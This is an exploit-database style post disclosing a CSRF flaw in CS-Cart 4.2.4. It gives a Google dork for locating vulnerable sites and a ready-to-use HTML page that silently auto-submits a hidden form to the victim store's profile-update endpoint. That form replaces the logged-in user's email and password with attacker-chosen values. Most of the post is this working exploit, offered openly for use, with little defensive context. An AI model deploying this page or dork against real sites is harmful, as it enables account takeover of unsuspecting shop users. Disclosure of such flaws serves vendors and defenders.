# Exploit Title: CS-Cart 4.2.4 CSRF
# Google Dork: intext:"© 2004-2015 Simtech"
# Date: March 11, 2015
# Exploit Author: Luis Santana
# Vendor Homepage: http://cs-cart.com
# Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate
# Version: 4.2.4
# Tested on: Linux + PHP
# CVE : [if one exists, or other VDB reference]
Standard CSRF, allow you to change a users's password. Fairly lame but I noticed no one had reported this bug yet.
Exploit pasted below and attached.
<html>
<head>
<title>CS-CART CSRF 0day Exploit</title>
</head>
<body>
<!-- Discovered By: Connection
Exploit By: Connection
Blacksun Hacker's Club
irc.blacksunhackers.com #lobby
-->
<form action="http://<victim>/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden">
<input type="hidden" name="user_data[email]" value="hacked@lol.dongs" />
<input type="hidden" name="user_data[password1]" value="CSRFpass" />
<input type="hidden" name="user_data[password2]" value="CSRFpass" />
<input type="hidden" name="user_data[profile_name]" value="Concept" />
<input type="hidden" name="dispatch[profiles.update]" value="" />
</form>
<script>
document.getElementById("CSRF").submit();
</script>
</body>
</html>
Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground